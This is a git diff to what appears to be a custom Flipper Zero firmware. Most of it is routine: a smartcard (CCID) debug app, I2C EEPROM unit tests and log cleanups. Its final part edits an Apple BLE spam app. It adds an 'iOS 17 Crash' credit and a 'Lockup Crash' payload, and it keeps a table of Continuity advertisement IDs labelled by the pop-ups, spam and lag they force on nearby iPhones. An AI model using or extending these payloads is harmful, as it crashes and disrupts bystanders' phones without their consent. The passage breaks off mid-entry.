diff --git a/SConstruct b/SConstruct index 8d389b70b..698ea85ec 100644 --- a/SConstruct +++ b/SConstruct @@ -77,6 +77,8 @@ if GetOption("fullenv") or any( "${COPRO_DISCLAIMER}", "--obdata", '"${ROOT_DIR.abspath}/${COPRO_OB_DATA}"', + "--stackversion", + "${COPRO_CUBE_VERSION}", ] dist_resource_arguments = [ "-r", diff --git a/applications/debug/ccid_test/application.fam b/applications/debug/ccid_test/application.fam new file mode 100644 index 000000000..e0cbc8d85 --- /dev/null +++ b/applications/debug/ccid_test/application.fam @@ -0,0 +1,16 @@ +App( + appid="ccid_test", + name="CCID Debug", + apptype=FlipperAppType.DEBUG, + entry_point="ccid_test_app", + cdefines=["CCID_TEST"], + requires=[ + "gui", + ], + provides=[ + "ccid_test", + ], + stack_size=1 * 1024, + order=120, + fap_category="Debug", +) diff --git a/applications/debug/ccid_test/ccid_test_app.c b/applications/debug/ccid_test/ccid_test_app.c new file mode 100644 index 000000000..a2f936d74 --- /dev/null +++ b/applications/debug/ccid_test/ccid_test_app.c @@ -0,0 +1,159 @@ +#include +#include +#include + +#include +#include +#include +#include + +#include "iso7816_t0_apdu.h" + +typedef enum { + EventTypeInput, +} EventType; + +typedef struct { + Gui* gui; + ViewPort* view_port; + FuriMessageQueue* event_queue; + FuriHalUsbCcidConfig ccid_cfg; +} CcidTestApp; + +typedef struct { + union { + InputEvent input; + }; + EventType type; +} CcidTestAppEvent; + +typedef enum { + CcidTestSubmenuIndexInsertSmartcard, + CcidTestSubmenuIndexRemoveSmartcard, + CcidTestSubmenuIndexInsertSmartcardReader +} SubmenuIndex; + +void icc_power_on_callback(uint8_t* atrBuffer, uint32_t* atrlen, void* context) { + UNUSED(context); + + iso7816_answer_to_reset(atrBuffer, atrlen); +} + +void xfr_datablock_callback(uint8_t* dataBlock, uint32_t* dataBlockLen, void* context) { + UNUSED(context); + + struct ISO7816_Response_APDU responseAPDU; + //class not supported + responseAPDU.SW1 = 0x6E; + responseAPDU.SW2 = 0x00; + + iso7816_write_response_apdu(&responseAPDU, dataBlock, dataBlockLen); +} + +static const CcidCallbacks ccid_cb = { + icc_power_on_callback, + xfr_datablock_callback, +}; + +static void ccid_test_app_render_callback(Canvas* canvas, void* ctx) { + UNUSED(ctx); + canvas_clear(canvas); + + canvas_set_font(canvas, FontPrimary); + canvas_draw_str(canvas, 0, 10, "CCID Test App"); + + canvas_set_font(canvas, FontSecondary); + canvas_draw_str(canvas, 0, 63, "Hold [back] to exit"); +} + +static void ccid_test_app__input_callback(InputEvent* input_event, void* ctx) { + FuriMessageQueue* event_queue = ctx; + + CcidTestAppEvent event; + event.type = EventTypeInput; + event.input = *input_event; + furi_message_queue_put(event_queue, &event, FuriWaitForever); +} + +uint32_t ccid_test_exit(void* context) { + UNUSED(context); + return VIEW_NONE; +} + +CcidTestApp* ccid_test_app_alloc() { + CcidTestApp* app = malloc(sizeof(CcidTestApp)); + + // Gui + app->gui = furi_record_open(RECORD_GUI); + + //viewport + app->view_port = view_port_alloc(); + gui_add_view_port(app->gui, app->view_port, GuiLayerFullscreen); + view_port_draw_callback_set(app->view_port, ccid_test_app_render_callback, NULL); + + //message queue + app->event_queue = furi_message_queue_alloc(8, sizeof(CcidTestAppEvent)); + furi_check(app->event_queue); + view_port_input_callback_set(app->view_port, ccid_test_app__input_callback, app->event_queue); + + return app; +} + +void ccid_test_app_free(CcidTestApp* app) { + furi_assert(app); + + //message queue + furi_message_queue_free(app->event_queue); + + //view port + gui_remove_view_port(app->gui, app->view_port); + view_port_free(app->view_port); + + // Close gui record + furi_record_close(RECORD_GUI); + app->gui = NULL; + + // Free rest + free(app); +} + +int32_t ccid_test_app(void* p) { + UNUSED(p); + + //setup view + CcidTestApp* app = ccid_test_app_alloc(); + + //setup CCID USB + // On linux: set VID PID using: /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plist + app->ccid_cfg.vid = 0x1234; + app->ccid_cfg.pid = 0x5678; + + FuriHalUsbInterface* usb_mode_prev = furi_hal_usb_get_config(); + furi_hal_usb_unlock(); + furi_hal_ccid_set_callbacks((CcidCallbacks*)&ccid_cb); + furi_check(furi_hal_usb_set_config(&usb_ccid, &app->ccid_cfg) == true); + + //handle button events + CcidTestAppEvent event; + while(1) { + FuriStatus event_status = + furi_message_queue_get(app->event_queue, &event, FuriWaitForever); + + if(event_status == FuriStatusOk) { + if(event.type == EventTypeInput) { + if(event.input.type == InputTypeLong && event.input.key == InputKeyBack) { + break; + } + } + } + view_port_update(app->view_port); + } + + //tear down USB + furi_hal_usb_set_config(usb_mode_prev, NULL); + furi_hal_ccid_set_callbacks(NULL); + + //teardown view + ccid_test_app_free(app); + return 0; +} diff --git a/applications/debug/ccid_test/iso7816_t0_apdu.c b/applications/debug/ccid_test/iso7816_t0_apdu.c new file mode 100644 index 000000000..29f5f7a86 --- /dev/null +++ b/applications/debug/ccid_test/iso7816_t0_apdu.c @@ -0,0 +1,36 @@ +/* Implements rudimentary iso7816-3 support for APDU (T=0) */ +#include +#include +#include +#include "iso7816_t0_apdu.h" + +void iso7816_answer_to_reset(uint8_t* atrBuffer, uint32_t* atrlen) { + //minimum valid ATR: https://smartcard-atr.apdu.fr/parse?ATR=3B+00 + uint8_t AtrBuffer[2] = { + 0x3B, //TS (direct convention) + 0x00 // T0 (Y(1): b0000, K: 0 (historical bytes)) + }; + *atrlen = 2; + + memcpy(atrBuffer, AtrBuffer, sizeof(uint8_t) * (*atrlen)); +} + +void iso7816_read_command_apdu( + struct ISO7816_Command_APDU* command, + const uint8_t* dataBuffer, + uint32_t dataLen) { + furi_assert(dataLen <= 4); + command->CLA = dataBuffer[0]; + command->INS = dataBuffer[1]; + command->P1 = dataBuffer[2]; + command->P2 = dataBuffer[3]; +} + +void iso7816_write_response_apdu( + const struct ISO7816_Response_APDU* response, + uint8_t* dataBuffer, + uint32_t* dataLen) { + dataBuffer[0] = response->SW1; + dataBuffer[1] = response->SW2; + *dataLen = 2; +} \ No newline at end of file diff --git a/applications/debug/ccid_test/iso7816_t0_apdu.h b/applications/debug/ccid_test/iso7816_t0_apdu.h new file mode 100644 index 000000000..8a8c99f85 --- /dev/null +++ b/applications/debug/ccid_test/iso7816_t0_apdu.h @@ -0,0 +1,32 @@ +#ifndef _ISO7816_T0_APDU_H_ +#define _ISO7816_T0_APDU_H_ + +#include + +struct ISO7816_Command_APDU { + //header + uint8_t CLA; + uint32_t INS; + uint8_t P1; + uint8_t P2; + + //body + uint8_t Nc; + uint8_t Ne; +} __attribute__((packed)); + +struct ISO7816_Response_APDU { + uint8_t SW1; + uint32_t SW2; +} __attribute__((packed)); + +void iso7816_answer_to_reset(uint8_t* atrBuffer, uint32_t* atrlen); +void iso7816_read_command_apdu( + struct ISO7816_Command_APDU* command, + const uint8_t* dataBuffer, + uint32_t dataLen); +void iso7816_write_response_apdu( + const struct ISO7816_Response_APDU* response, + uint8_t* dataBuffer, + uint32_t* dataLen); +#endif //_ISO7816_T0_APDU_H_ diff --git a/applications/debug/unit_tests/furi_hal/furi_hal_tests.c b/applications/debug/unit_tests/furi_hal/furi_hal_tests.c index e942c5933..2dbaa4d86 100644 --- a/applications/debug/unit_tests/furi_hal/furi_hal_tests.c +++ b/applications/debug/unit_tests/furi_hal/furi_hal_tests.c @@ -5,6 +5,11 @@ #include "../minunit.h" #define DATA_SIZE 4 +#define EEPROM_ADDRESS 0b10101000 +#define EEPROM_ADDRESS_HIGH (EEPROM_ADDRESS | 0b10) +#define EEPROM_SIZE 512 +#define EEPROM_PAGE_SIZE 16 +#define EEPROM_WRITE_DELAY_MS 6 static void furi_hal_i2c_int_setup() { furi_hal_i2c_acquire(&furi_hal_i2c_handle_power); @@ -14,6 +19,14 @@ static void furi_hal_i2c_int_teardown() { furi_hal_i2c_release(&furi_hal_i2c_handle_power); } +static void furi_hal_i2c_ext_setup() { + furi_hal_i2c_acquire(&furi_hal_i2c_handle_external); +} + +static void furi_hal_i2c_ext_teardown() { + furi_hal_i2c_release(&furi_hal_i2c_handle_external); +} + MU_TEST(furi_hal_i2c_int_1b) { bool ret = false; uint8_t data_one = 0; @@ -103,14 +116,116 @@ MU_TEST(furi_hal_i2c_int_1b_fail) { mu_assert(data_one != 0, "9 invalid data"); } +MU_TEST(furi_hal_i2c_int_ext_3b) { + bool ret = false; + uint8_t data_many[DATA_SIZE] = {0}; + + // 3 byte: read + data_many[0] = LP5562_CHANNEL_BLUE_CURRENT_REGISTER; + ret = furi_hal_i2c_tx_ext( + &furi_hal_i2c_handle_power, + LP5562_ADDRESS, + false, + data_many, + 1, + FuriHalI2cBeginStart, + FuriHalI2cEndAwaitRestart, + LP5562_I2C_TIMEOUT); + mu_assert(ret, "3 tx failed"); + + // Send a RESTART condition, then read the 3 bytes one after the other + ret = furi_hal_i2c_rx_ext( + &furi_hal_i2c_handle_power, + LP5562_ADDRESS, + false, + data_many + 1, + 1, + FuriHalI2cBeginRestart, + FuriHalI2cEndPause, + LP5562_I2C_TIMEOUT); + mu_assert(ret, "4 rx failed"); + mu_assert(data_many[1] != 0, "4 invalid data"); + ret = furi_hal_i2c_rx_ext( + &furi_hal_i2c_handle_power, + LP5562_ADDRESS, + false, + data_many + 2, + 1, + FuriHalI2cBeginResume, + FuriHalI2cEndPause, + LP5562_I2C_TIMEOUT); + mu_assert(ret, "5 rx failed"); + mu_assert(data_many[2] != 0, "5 invalid data"); + ret = furi_hal_i2c_rx_ext( + &furi_hal_i2c_handle_power, + LP5562_ADDRESS, + false, + data_many + 3, + 1, + FuriHalI2cBeginResume, + FuriHalI2cEndStop, + LP5562_I2C_TIMEOUT); + mu_assert(ret, "6 rx failed"); + mu_assert(data_many[3] != 0, "6 invalid data"); +} + +MU_TEST(furi_hal_i2c_ext_eeprom) { + if(!furi_hal_i2c_is_device_ready(&furi_hal_i2c_handle_external, EEPROM_ADDRESS, 100)) { + printf("no device connected, skipping\r\n"); + return; + } + + bool ret = false; + uint8_t buffer[EEPROM_SIZE] = {0}; + + for(size_t page = 0; page < (EEPROM_SIZE / EEPROM_PAGE_SIZE); ++page) { + // Fill page buffer + for(size_t page_byte = 0; page_byte < EEPROM_PAGE_SIZE; ++page_byte) { + // Each byte is its position in the EEPROM modulo 256 + uint8_t byte = ((page * EEPROM_PAGE_SIZE) + page_byte) % 256; + + buffer[page_byte] = byte; + } + + uint8_t address = (page < 16) ? EEPROM_ADDRESS : EEPROM_ADDRESS_HIGH; + + ret = furi_hal_i2c_write_mem( + &furi_hal_i2c_handle_external, + address, + page * EEPROM_PAGE_SIZE, + buffer, + EEPROM_PAGE_SIZE, + 20); + + mu_assert(ret, "EEPROM write failed"); + furi_delay_ms(EEPROM_WRITE_DELAY_MS); + } + + ret = furi_hal_i2c_read_mem( + &furi_hal_i2c_handle_external, EEPROM_ADDRESS, 0, buffer, EEPROM_SIZE, 100); + + mu_assert(ret, "EEPROM read failed"); + + for(size_t pos = 0; pos < EEPROM_SIZE; ++pos) { + mu_assert_int_eq(pos % 256, buffer[pos]); + } +} + MU_TEST_SUITE(furi_hal_i2c_int_suite) { MU_SUITE_CONFIGURE(&furi_hal_i2c_int_setup, &furi_hal_i2c_int_teardown); MU_RUN_TEST(furi_hal_i2c_int_1b); MU_RUN_TEST(furi_hal_i2c_int_3b); + MU_RUN_TEST(furi_hal_i2c_int_ext_3b); MU_RUN_TEST(furi_hal_i2c_int_1b_fail); } +MU_TEST_SUITE(furi_hal_i2c_ext_suite) { + MU_SUITE_CONFIGURE(&furi_hal_i2c_ext_setup, &furi_hal_i2c_ext_teardown); + MU_RUN_TEST(furi_hal_i2c_ext_eeprom); +} + int run_minunit_test_furi_hal() { MU_RUN_SUITE(furi_hal_i2c_int_suite); + MU_RUN_SUITE(furi_hal_i2c_ext_suite); return MU_EXIT_CODE; } diff --git a/applications/debug/unit_tests/subghz/subghz_test.c b/applications/debug/unit_tests/subghz/subghz_test.c index 58e253560..1942d40d8 100644 --- a/applications/debug/unit_tests/subghz/subghz_test.c +++ b/applications/debug/unit_tests/subghz/subghz_test.c @@ -96,9 +96,9 @@ static bool subghz_decoder_test(const char* path, const char* name_decoder) { } subghz_file_encoder_worker_free(file_worker_encoder_handler); } - FURI_LOG_T(TAG, "\r\n Decoder count parse \033[0;33m%d\033[0m ", subghz_test_decoder_count); + FURI_LOG_T(TAG, "Decoder count parse %d", subghz_test_decoder_count); if(furi_get_tick() - test_start > TEST_TIMEOUT) { - printf("\033[0;31mTest decoder %s ERROR TimeOut\033[0m\r\n", name_decoder); + printf("Test decoder %s ERROR TimeOut\r\n", name_decoder); return false; } else { return subghz_test_decoder_count ? true : false; @@ -135,9 +135,9 @@ static bool subghz_decode_random_test(const char* path) { } subghz_file_encoder_worker_free(file_worker_encoder_handler); } - FURI_LOG_D(TAG, "\r\n Decoder count parse \033[0;33m%d\033[0m ", subghz_test_decoder_count); + FURI_LOG_D(TAG, "Decoder count parse %d", subghz_test_decoder_count); if(furi_get_tick() - test_start > TEST_TIMEOUT * 10) { - printf("\033[0;31mRandom test ERROR TimeOut\033[0m\r\n"); + printf("Random test ERROR TimeOut\r\n"); return false; } else if(subghz_test_decoder_count == TEST_RANDOM_COUNT_PARSE) { return true; @@ -198,10 +198,9 @@ static bool subghz_encoder_test(const char* path) { subghz_transmitter_free(transmitter); } flipper_format_free(fff_data_file); - FURI_LOG_T(TAG, "\r\n Decoder count parse \033[0;33m%d\033[0m ", subghz_test_decoder_count); + FURI_LOG_T(TAG, "Decoder count parse %d", subghz_test_decoder_count); if(furi_get_tick() - test_start > TEST_TIMEOUT) { - printf( - "\033[0;31mTest encoder %s ERROR TimeOut\033[0m\r\n", furi_string_get_cstr(temp_str)); + printf("Test encoder %s ERROR TimeOut\r\n", furi_string_get_cstr(temp_str)); subghz_test_decoder_count = 0; } furi_string_free(temp_str); diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index ace2e82d3..de6ee8b22 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -16,45 +16,48 @@ typedef struct { // Hacked together by @Willy-JL // Custom adv logic by @Willy-JL (idea by @xMasterX) +// iOS 17 Crash by @ECTO-1A // Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam -static Payload payloads[] = { +static Payload + payloads[] = + { #if false - {.title = "AirDrop", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeAirDrop, - .data = {.airdrop = {}}, - }}, - {.title = "Airplay Target", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeAirplayTarget, - .data = {.airplay_target = {}}, - }}, - {.title = "Handoff", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeHandoff, - .data = {.handoff = {}}, - }}, - {.title = "Tethering Source", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeTetheringSource, - .data = {.tethering_source = {}}, - }}, + {.title = "AirDrop", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeAirDrop, + .data = {.airdrop = {}}, + }}, + {.title = "Airplay Target", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeAirplayTarget, + .data = {.airplay_target = {}}, + }}, + {.title = "Handoff", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeHandoff, + .data = {.handoff = {}}, + }}, + {.title = "Tethering Source", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeTetheringSource, + .data = {.tethering_source = {}}, + }}, {.title = "Mobile Backup", .text = "", .random = false, @@ -175,279 +178,295 @@ static Payload payloads[] = { .type = ContinuityTypeNearbyAction, .data = {.nearby_action = {.flags = 0xC0, .type = 0x17}}, }}, + {.title = "Nearby Info", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyInfo, + .data = {.nearby_info = {}}, + }}, #endif - {.title = "Random Action", - .text = "Spam shuffle Nearby Actions", - .random = true, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x00}}, - }}, - {.title = "Random Pair", - .text = "Spam shuffle Proximity Pairs", - .random = true, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x00, .model = 0x0000}}, - }}, - {.title = "AppleTV AutoFill", - .text = "Banner, unlocked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x13}}, - }}, - {.title = "AppleTV Connecting...", - .text = "Modal, unlocked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x27}}, - }}, - {.title = "Join This AppleTV?", - .text = "Modal, unlocked, spammy", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xBF, .type = 0x20}}, - }}, - {.title = "AppleTV Audio Sync", - .text = "Banner, locked, long range", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x19}}, - }}, - {.title = "AppleTV Color Balance", - .text = "Banner, locked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x1E}}, - }}, - {.title = "Setup New iPhone", - .text = "Modal, locked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x09}}, - }}, - {.title = "Setup New Random", - .text = "Modal, locked, glitched", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0x40, .type = 0x09}}, - }}, - {.title = "Transfer Phone Number", - .text = "Modal, locked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x02}}, - }}, - {.title = "HomePod Setup", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0B}}, - }}, - {.title = "AirPods Pro", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0E20}}, - }}, - {.title = "Beats Solo 3", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0620}}, - }}, - {.title = "AirPods Max", - .text = "Modal, laggy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0A20}}, - }}, - {.title = "Beats Flex", - .text = "Modal, laggy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1020}}, - }}, - {.title = "Airtag", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0055}}, - }}, - {.title = "Hermes Airtag", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0030}}, - }}, - {.title = "Setup New AppleTV", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x01}}, - }}, - {.title = "Pair AppleTV", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x06}}, - }}, - {.title = "HomeKit AppleTV Setup", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x0D}}, - }}, - {.title = "AppleID for AppleTV?", - .text = "Modal, unlocked", - .random = false, - .msg = - { - .type = ContinuityTypeNearbyAction, - .data = {.nearby_action = {.flags = 0xC0, .type = 0x2B}}, - }}, - {.title = "AirPods", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0220}}, - }}, - {.title = "AirPods 2nd Gen", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0F20}}, - }}, - {.title = "AirPods 3rd Gen", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1320}}, - }}, - {.title = "AirPods Pro 2nd Gen", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1420}}, - }}, - {.title = "Powerbeats 3", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0320}}, - }}, - {.title = "Powerbeats Pro", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0B20}}, - }}, - {.title = "Beats Solo Pro", - .text = "", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0C20}}, - }}, - {.title = "Beats Studio Buds", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1120}}, - }}, - {.title = "Beats X", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0520}}, - }}, - {.title = "Beats Studio 3", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0920}}, - }}, - {.title = "Beats Studio Pro", - .text = "Modal, spammy (stays open)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1720}}, - }}, - {.title = "Beats Fit Pro", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1220}}, - }}, - {.title = "Beats Studio Buds+", - .text = "Modal, spammy (auto close)", - .random = false, - .msg = - { - .type = ContinuityTypeProximityPair, - .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1620}}, - }}, + {.title = "Lockup Crash", + .text = "iOS 17, locked, long range", + .random = false, + .msg = + { + .type = ContinuityTypeCustomCrash, + .data = {.custom_crash = {}}, + }}, + {.title = "Random Action", + .text = "Spam shuffle Nearby Actions", + .random = true, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x00}}, + }}, + {.title = "Random Pair", + .text = "Spam shuffle Proximity Pairs", + .random = true, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x00, .model = 0x0000}}, + }}, + {.title = "AppleTV AutoFill", + .text = "Banner, unlocked, long range", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x13}}, + }}, + {.title = "AppleTV Connecting...", + .text = "Modal, unlocked, long range", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x27}}, + }}, + {.title = "Join This AppleTV?", + .text = "Modal, unlocked, spammy", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xBF, .type = 0x20}}, + }}, + {.title = "AppleTV Audio Sync", + .text = "Banner, locked, long range", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x19}}, + }}, + {.title = "AppleTV Color Balance", + .text = "Banner, locked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x1E}}, + }}, + {.title = "Setup New iPhone", + .text = "Modal, locked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x09}}, + }}, + {.title = "Setup New Random", + .text = "Modal, locked, glitched", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0x40, .type = 0x09}}, + }}, + {.title = "Transfer Phone Number", + .text = "Modal, locked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x02}}, + }}, + {.title = "HomePod Setup", + .text = "Modal, unlocked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x0B}}, + }}, + {.title = "AirPods Pro", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0E20}}, + }}, + {.title = "Beats Solo 3", + .text = "Modal, spammy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0620}}, + }}, + {.title = "AirPods Max", + .text = "Modal, laggy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0A20}}, + }}, + {.title = "Beats Flex", + .text = "Modal, laggy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1020}}, + }}, + {.title = "Airtag", + .text = "Modal, unlocked", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0055}}, + }}, + {.title = "Hermes Airtag", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x05, .model = 0x0030}}, + }}, + {.title = "Setup New AppleTV", + .text = "Modal, unlocked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x01}}, + }}, + {.title = "Pair AppleTV", + .text = "Modal, unlocked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x06}}, + }}, + {.title = "HomeKit AppleTV Setup", + .text = "Modal, unlocked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x0D}}, + }}, + {.title = "AppleID for AppleTV?", + .text = "Modal, unlocked", + .random = false, + .msg = + { + .type = ContinuityTypeNearbyAction, + .data = {.nearby_action = {.flags = 0xC0, .type = 0x2B}}, + }}, + {.title = "AirPods", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0220}}, + }}, + {.title = "AirPods 2nd Gen", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0F20}}, + }}, + {.title = "AirPods 3rd Gen", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1320}}, + }}, + {.title = "AirPods Pro 2nd Gen", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1420}}, + }}, + {.title = "Powerbeats 3", + .text = "Modal, spammy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0320}}, + }}, + {.title = "Powerbeats Pro", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0B20}}, + }}, + {.title = "Beats Solo Pro", + .text = "", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0C20}}, + }}, + {.title = "Beats Studio Buds", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1120}}, + }}, + {.title = "Beats X", + .text = "Modal, spammy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0520}}, + }}, + {.title = "Beats Studio 3", + .text = "Modal, spammy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x0920}}, + }}, + {.title = "Beats Studio Pro", + .text = "Modal, spammy (stays open)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1720}}, + }}, + {.title = "Beats Fit Pro", + .text = "Modal, spammy (auto close)", + .random = false, + .msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1220}}, + }}, + {.title = "Beats Studio Buds+", + .text = "Modal, spammy (auto close)", + .random = false, + 